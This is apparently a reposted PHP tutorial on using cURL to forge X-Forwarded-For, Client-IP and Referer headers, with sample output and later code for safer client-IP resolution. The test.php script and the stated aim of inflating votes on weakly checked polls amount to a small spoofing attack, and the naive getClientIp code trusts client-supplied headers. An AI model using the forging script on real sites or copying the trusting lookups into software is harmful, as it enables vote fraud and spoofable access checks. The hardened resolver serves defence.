
Use CURL to forge source URLs and IP

WBOY
2016-07-13 10:33:32

Many voting pages verify the source URL and IP of a request, but with CURL you can forge any URL and IP, which bypasses simple verifications of this kind. Here is a simple example.

Before running the program, please make sure extension=php_curl.dll in php.ini is not commented out.

test.php

<?php
	$ch = curl_init();  
	curl_setopt($ch, CURLOPT_URL, "http://localhost/test_2.php");  
	curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:8.8.8.8', 'CLIENT-IP:8.8.8.8'));  // forge the IP headers
	curl_setopt($ch, CURLOPT_REFERER, "http://www.bkjia.com/");   // forge the referer
	curl_setopt($ch, CURLOPT_HEADER, 1);  
	$out = curl_exec($ch);  
	curl_close($ch); 
?>

test.php sends a request to test_2.php, which contains the following:

<?php
	function getClientIp() {  
		if (!empty($_SERVER["HTTP_CLIENT_IP"]))  
			$ip = $_SERVER["HTTP_CLIENT_IP"];  
		else if (!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))  
			$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];  
		else if (!empty($_SERVER["REMOTE_ADDR"]))  
			$ip = $_SERVER["REMOTE_ADDR"];  
		else  
			$ip = "err";  
		return $ip;  
	}
	  
	echo "<br />IP: " . getClientIp() . "";  
	echo "<br />referer: " . $_SERVER["HTTP_REFERER"]; 
?>

The results of running the program are as follows:

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 12:20:06 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
Content-Length: 53
Content-Type: text/html

IP: 8.8.8.8
referer: http://www.bkjia.com/

As you can see, the IP and the source address can be changed at will. Voting functions with an imperfect verification mechanism can therefore have their votes brushed (inflated) this way.

A side note about the real IP.

Generally, the environment variable $_SERVER['REMOTE_ADDR'] is used to obtain the user's IP. However, this variable records only the IP of the last host that connected to the server, so when the user's browser is configured to use a proxy, the user's real IP cannot be obtained from it.

In that case you can use another environment variable, $_SERVER['HTTP_X_FORWARDED_FOR']. It records the host IPs the request passed through, but it is only present when the user goes through a proxy, so you can write something like the following to get the real IP.

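<?php
// No X-Forwarded-For header: use the address of the connecting host.
if (empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
    $myip = $_SERVER['REMOTE_ADDR'];
}
else
{
    // The header is a comma-separated list; take the first entry.
    $myip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
    $myip = $myip[0];
}
echo $myip;
?>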
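The two lookups above accept X-Forwarded-For and Client-IP from any client, which is exactly what test.php exploits. The following is an added example, not code from the original article: a hardened lookup that honours X-Forwarded-For only when the TCP peer is a reverse proxy you operate. The function name `resolveClientIp`, the `$trustedProxies` list and all sample addresses are assumptions constructed for illustration.

```php
<?php
// Added example (not from the original article).
// $trustedProxies: assumed list of reverse proxies you operate yourself.
function resolveClientIp(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return 'err';
    }
    // Peer is not one of our proxies: any X-Forwarded-For or Client-IP
    // header was written by the client itself, so it is ignored.
    if (!in_array($remote, $trustedProxies, true)
        || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // Each proxy appends the peer it saw, so read the list from the right
    // and stop at the first hop that is not one of our own proxies.
    $hops = array_reverse(array_map('trim',
        explode(',', $server['HTTP_X_FORWARDED_FOR'])));
    foreach ($hops as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            return $remote;   // malformed chain: fall back to the TCP peer
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    return $remote;           // chain contained only our own proxies
}

// Constructed sample requests; the first mirrors what test.php sends.
$proxies = array('10.0.0.5');
$samples = array(
    'forged headers, direct client' => array(
        'REMOTE_ADDR' => '127.0.0.1',
        'HTTP_X_FORWARDED_FOR' => '8.8.8.8',
        'HTTP_CLIENT_IP' => '8.8.8.8'),
    'real client behind our proxy' => array(
        'REMOTE_ADDR' => '10.0.0.5',
        'HTTP_X_FORWARDED_FOR' => '198.51.100.23'),
    'forged entry prepended by client' => array(
        'REMOTE_ADDR' => '10.0.0.5',
        'HTTP_X_FORWARDED_FOR' => '8.8.8.8, 198.51.100.23'),
);
foreach ($samples as $label => $server) {
    echo $label, ': ', resolveClientIp($server, $proxies), PHP_EOL;
}
```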
